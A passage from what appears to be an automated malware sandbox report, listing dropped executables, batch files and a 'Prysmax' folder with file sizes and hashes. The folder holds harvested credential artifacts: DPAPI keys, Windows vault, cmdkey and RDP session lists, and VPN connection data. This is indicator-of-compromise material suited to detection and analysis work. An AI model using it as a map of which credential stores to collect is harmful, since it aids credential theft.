                                                                                                                                                                                                                                                                            a838a21105591bd5a7fc20763020c794917d4239fede6a4cd6ee908130e8e3da94bdc6560e4af877e89480991abe70bb7eed3389620e1caf03955b4d9365be6a

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413370101\bf63e36e97.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            311dafc7caa1981ac46344dc06086a1e

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            5cda2a58ccd7ab1112a3445f7f11ad31d0195f3c

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            60f931aa5fef6b83082dd0c66331100ef9ecf90dc517d4fae256df08e49043c4

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            2cada8a0b930da6769970c9471aab55025f5d8ce4ecd7fc15cc8f1771a5805d2bb7b3bef6d1af76de7053e37f25c5e67390ee7eab235c5f11e7af7083bf471d9

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413380101\d8bc43181b.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2.3MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9a70ef56437f86c6125e996f53233406

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            08eaad5730c98e8624c43e889a1b5dd13a4e9c70

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            9720bd9aaaae46a1be33aea14f49847d48517f74dae7a7c118fe593108075d28

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4eaaf4f957323b3be4d6686ff53650556c4349369166a3e4ab576c2eb5309e97ad954ec0970965e585894725906f8722960dcbd3eadb3c821b04272f8f523ce1

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413390101\8726cdeb67.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            947KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            be9266b6d07dd5c9f071eed4f55f92ea

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            9adad306a6b0a670bea67fae4d8f4f078f95735d

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            2ad49aaca12035440c43ac4dc0642b0cdbf99d98d94209626c101ab488341b1f

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            a22515ebd7f2078c9f2c318fb3352ed4bb52eb39000d171f5895985ffc68b89b549f5f3f53d7bb8fa4a82ed14032cea6e5f07660bd5bbb32fc444f79e714303c

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413400101\6089caffb3.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.7MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            60c79710a31769fd938b87b6f2c714cb

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            0982ef8bc755f3688115c6043325318e8ce174e0

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            0d3e93bc1de27fb22a0e523c940c81d825cfe92688360b91c6fea5f587de1cb9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            6a425887119ed799a165edd16cefee6fc51221a7f6980c8d0eec916c0b0396aa77d16c81beb6227c60d57efb881bf1cc66bca34a578558d348e66a6fd66e5df4

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.9MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d59871d68dc69ee99a5cebbd0e4afdf6

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            4096ad689f13f6f9662959c8a2fd11638133f259

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            3eea14ed7211404b87b48024fcc56fb713b20dde9aa07c90fe4eebce7a16c7e5

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            6a5e7936918d3db4ff89f6381540d60162e714f9be86c1f45f2bc92d13e9c6703eaeff48ab182b4e00f378e64732b57a83f850e775abf7aeba357a61bad3d2fc

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            354KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            27f0df9e1937b002dbd367826c7cfeaf

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            7d66f804665b531746d1a94314b8f78343e3eb4f

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            aff35e23562fc36f4b8f6b5bf95eb5dbf11e8af6674e3212aa0c4077ddfe8209

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            ee4e7e5a8ffe193a8487dd4e9bfb13affa74cacdf250a4e22ed0fc653bbfb615855771dd41d295be905bed311c1690874ce61a5a9d9a5745b4bc550715c7de17

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            a06b6ca8d9a307911573389aee28fc34

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            1981c60d68715c6f55b02de840b091000085c056

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            cce36fa950470b05beb043a273be6ddc93c55550d1e7ee1472cf807e2c87887c

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            3a8fb1466bff7806dddc88764a5f02db18f77a32e2dd4de3168130a7b3c8c552f97f60766805b0050634d5100c190dbf56e1e3340c424f091c6299410c85fc89

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.9MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            f88e81846f7e7666edb9f04c933fd426

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            80dae46a3c2c517b4c1b5d95228b0d5dcfa65359

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            c8cb3ae4287b10d16c5557b47a6ad9220f097f5449da1c4e575a8194219806d3

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            c86b57f648069d31f2ef3bfddc5cb9f36698e113d52966f4b060c5f0212c5a87331d34ca32f04ea5655d79e8e7e7c17f763ac70b07b0558fb87ff8ef54861c5a

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2.1MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            88796c2e726272bbd7fd7b96d78d1d98

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b359918e124eda58af102bb1565c52a32613c656

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            85fa677d5892fe5c794eb9d0e51dd317b8d898e97c49a9a1c4875417c0147556

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            71a2c25af532942b5676eb0274ed7dcd75c6a4ce69d3bd9541f162d466abb7be299394111a718774884c3cde8518b11fb926343f93a06853433664065510280c

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413470101\81bb507991.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.8MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            cd83a6a8995412741ba83cd2ec46cd25

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            474b6f7038c2095e9d9cdaec4448f1358f646a0a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            afd5b080f380c6181252c95da91e8bf22f8febfa11340bf967f6ab5d2b887495

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            70679001b9519d44b4b0567182054cf94bd7dca6de404ef81c5ad4c171f11de6ae973b387bfcf47172da0a6ff9c1d249b0a37dc5fecbb3f4fba12b46627303c4

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2.2MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            fb5b1e8b265d9d1f567382122ad9aeb0

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d79d1fe809aa7f6ddafdc08f680def84f4dd8243

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            e4211d0e545311bb60f65f15404c590ce1a0ef4db12ce470e492d7975d3e7b6d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            76d6f9c485f1fc64cdc08c26454ec85bdea0e2304de9676a8db0fe5fccc5fa96e220ec57080214bf1aeffa815c7ae9af12f1cc0cb46782d514d0a4baee5441b1

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            7d842fd43659b1a8507b2555770fb23e

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\261.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            89ccc29850f1881f860e9fd846865cad

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d781641be093f1ea8e3a44de0e8bcc60f3da27d0

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ADD4.tmp\ADD5.tmp\ADD6.bat

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            e5ddb7a24424818e3b38821cc50ee6fd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            97931d19f71b62b3c8a2b104886a9f1437e84c48

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            4734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Expectations.cab.bat

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            25KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ccc575a89c40d35363d3fde0dc6d2a70

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            7c068da9c9bb8c33b36aed898fbd39aa061c4ba4

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\JCDJCf228r4e18d7ff\YCL.exe

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            3.0MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            91f372706c6f741476ee0dac49693596

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            8e8973d35d3de0ade6cc8e44cd21f2cffbdfe83d

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            9a401dded25b4bafd24225449ed48468787290bbb308dc5e40511da2858bb781

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            88b26c1c49bc2a77dbdcea0e22c33555932498b3a4cff66f6b08438c0d96a017367c14508249aa1ca2090ed0ca6081e28757fbda97f856675d9db9cc61f7b7ed

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax.zip

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            2.9MB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            79e07c4e03044ca11a5a540c10fafc25

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            1ac77f0838fc752cb925de32a84de16d8a31d368

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            ee3adee066562a36b9f1aea867584429905806e9a4b153a233e943d7c45549f9

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            13c226e21cf2470625bb2f9c4b74129868d370e15979c3442541a6584e7253d3cfc2cfdf04c66120ca2d6f063a3710e37c42d20e49954b797fc67ee98e3c9f4f

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\CREDHIST

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            24B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ac99d227a016fa63abd9fef997317eb4

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d430aa7a34740510ae525a9b760f9643d1fa28d8

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            37bc69433d7f75ad586a78dcf7172229dc85e31b665c5df0bf3a020b0bd83e97

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            452ac3eca7ea12ac439efc939181744c427c64832d4cbfdc413c9e43f46cbf446046418172f0b45c179c9fb9bfe2e280c8c9f028b15cfaa7c5ee68c14f4dd477

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-3342763580-2723508992-2885672917-1000\3d8d3c53-dcf2-46f9-83de-e2eda212d06a

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            468B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            959e5173ddfd41634e1e566c2d22e88c

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            bf1b3077f82119567dacd57d608e67ea8124f647

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            53137b7e0689ebb70b4e2ae557861de3a38a53ad8389f8eff7d69f4952022c39

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            545cbecc78e4ccc33a3fba7ab6ad60b72f508d6c0c0590cbb7b496b7c5e7fcaaf01dec18791993bd1b0fd113da942135e1280b6bdf69de78ae1429ad3af2af56

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_1\S-1-5-21-3342763580-2723508992-2885672917-1000\Preferred

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            24B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            72d056fe8649a70633760d642c7b36fd

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            aa046acc025e442783233ab7f43ea3d34700044d

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            31dfbd9cebd7e339b8c37cc7c1d51885f297e7b3848544f0632f8628b7da8508

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d85147d684ba63008a723ff982322ef78dc242caa4e6846ef2a0718951c5e1f2aa9434f9a7247a150fe7aacf30d8010d6411b21b9410d976e85312795e50b2da

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\Credentials_2\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            8091ff451a2281f8ab3f0dfb731776f9

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            57df86c8acccb5472014f71f6bf898652102c4e9

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            a12dfa9f93ad7268f727159ad9d97f347f8cb4fafba632c50cb5465adfece079

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            d8ad5945b71c52c0141ab29c063afe8ebee0914615825a82547add0c52e94a9b1994b1a70f8ecc10a36774d8da4ae1a11d1a6bd258e51f9726030e83477b207e

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\RDP_Sessions.txt

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            499B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            13ad7335611fcfb88efa3590a11f2212

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            ae8de55bb91229e0e3e082697c2ffa877340c437

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1f93e1567b7b8ddcf5db5ea670eecf1ce717ce72346bb28c131be218f25bf8ed

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            14e5393c6ad833c222d9f883006891190ce5811d484be079b820beb10fda99a8b0ec9c2470a091c8f0b118f5319b5425517849a50e72ed3c753beeba0132dc82

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\cmdkey_list.txt

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            310B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            38ba2292bbe4b32fa090dba480c9957c

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            a22684823db459a6511a5933ed20b5a2d9be253a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            34f62104e733ab2d5358f8174cbce32cd21c4374444883aa1eb45f6b74a5f7fe

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            00bb24c40f3bf94486a6ae40b261a9e01714ef81fe2a8b3988f7938f5c11d771dd10b9798711111233aab858be9ef30cfc3a0a45e800a8787f203ddfe7b8e215

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\Credentials\windows_vault.txt

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            336B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            da510ee1496286415109f3ec58d6123c

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            8886a1786606d8f5d693a6e87fef39054bd022af

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            82c3ed7cb28a633ba026353c6349e8305423e5e1202f8c6030ec1b8706932e73

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            f2b5b6e278e6a91e92d0dc296e7837c3d486505a23fe3f574a5c56735a369e30c06942a2695f09a110884d7988b512f02d9a599b82b6abe9bdb3f0e8d8286b77

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\ConnectedDevicesPlatform__connected devices platform certificates.sst

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            653B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            1f26917881a11a4300739afccccd0077

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            27dd63e44a2f247a9898f60e0ee0f1131a935d5c

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            5e5dcb801331d2684e42d30fdc5d6f55dd8c705c9eca590ba78a96f8148b28d1

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            e92445e056a195303ba0e3349986be688940568be15be9e914cba36f11dbf31504afda936af89496d40ab0c319a4a95ee68da727b0260743fa408e023f848bb0

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Desktop__disconnectinstall.snd

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            700KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            142ec5ca60fa5a4cbc1ec59f5ede5731

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            c98f8b6dceaef7eabffc189c1180d8af0c9d08fa

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            1b292e529eb8ddca7589dc7f42ec29eb3e06838bd2230ac4396c3dee7b14dfca

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            78ae8a7888fa6a71c75f66dd74ff813a7dffee1fbc09a8d08e1812011e7a4e86c469727d1866b25d90cf9b35d23d8814759f9201e1bc985a62331d36ee3b564c

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Documents__disconnectoptimize.xlsx

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5316920eb84d9d91dadb4740d974cbd6

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            ca79486e51e80b95dd531b97a1616ed9da5e149a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            5c847d7ee01919563d447b2909ade63a6f311d3f6ab76b99b882f16f907b5f56

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            6b13f381f1a2e23c52d23f4d5b211d849301ee9d4e559565787516e4db8a6a1cabbf172819d2013988f18ffe5069c08ffc7b390c09fa02345d34f2cccd5e1d11

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Downloads__editconnect.contact

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            546KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            bd7380073d5596fcd7b51cb5fc87a74a

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            05f7837ec01a7fa257f8888f1994b6bc66ab8d8a

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            c40702fe45b43b301ca64c7aa7e6e915d5825e263d04a82bf0c2f564fdb9768b

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            6afb2c5a8ef2d886011f76ff2b8f7626f6471105f7bcbbf27a60181b7524fbedb3cc8e26fef4730d510f773fcf1f558df59757516d624baed1c44cc2731085bc

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Music__importdisconnect.m3u

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            230KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            f37d56d6b8240608f8ddce7920a90b61

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3f0d0b451fdf8127b8275c7759295d962e958e59

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            2d548c4f94ddeb1ee6504756c71414211dd263eadd1b9a03119c60c6a7a1724e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            e7a51cbdf25e41697c3e6528763f3d0718e67cec6fccaa8b9bbd49c35d1706ec0ebaf440e36c8c03630419df8bd96d54448af9ab6cbb1a951780d96a6a03c6f8

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Pictures__connectcomplete.eps

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            370KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            436ff1057dc23c2e3609c037e0e2f23e

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            0fc76993f858b012149fb68f35fe108e3f97fa0e

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            c3400abd99e772c097b712b22447cc079f3b30ce0aa62ade4a5d04f43468c564

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            65ab715904d8fc60e9eb331e57a9dda6d16cc1b7b7570ad6b41c0b5d43c6ea238c944ddbbdccb8643e7a828682f94ca274749ff65e265e6edaa5f915925a88ee

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Pictures__dismountconnect.gif

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            348KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            493197b58a2a22ed6856b0ebddc5bc7b

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            bcd16e498797188f5e965c4e2af6d6fc4187b088

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            4f3d8c30347a242dc22a503b8cf733e90ac4056dd9efbf2ab72a699ce76c51dd

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            decfd61c2de67294aaf7e87fa759b59184bef5835ca096188f35a12ee9654b29e8a84df2acc4e3ef87d4e715e16c191f42fe7655e9ef9b3b5ccf967be1f935ed

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Pictures__exportconnect.dib

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            325KB

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ca78806aa49f8f9a15d51b5a00fcef43

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d66d8c4b17ebb912d82f9ffc305e3d41c89ca256

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            10d65a7c3cfbca7cae05d29b597a189495a61d6799406886ba37dac1de0093ad

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            229662b1bf6878754c294219b82f39213451fb50e0a76600abe40f3c44afb20be612dd322b79aa21a653bcc58e44a14bad7f5f624990b020a5ef171bbeabcdf6

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\Additional\Searches__winrt--{s-1-5-21-3342763580-2723508992-2885672917-1000}-.searchconnector-ms

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            859B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d59f3b8f003550d1bbdec86c03a7b37a

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            3c701b1916315374bbc71e0a000b944bcb381123

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            598d37baa41c4544ba295920f8a25d9bf7cffded257fdc18e6f717f7f9609ef2

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            09748a58cd121e86297e9d26c0cca771779420129229e900951c76a455b48e634eb20fc75b373f11e06aa993d23df87fe5251b710b71bc10cd09d35d372496e3

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Prysmax\Apps\VPN\WindowsVPN\windows_vpn_connections.txt

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            862B

                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            ac9b930e233d016346ff67d6a3f5a9e6

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            fcf0e44ae5b569708eeef45826e2f46e611a8eee

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            7fb38f1012513704aae95eb7f8cd64c3413f1e64609aa0ec59faa7698330487c

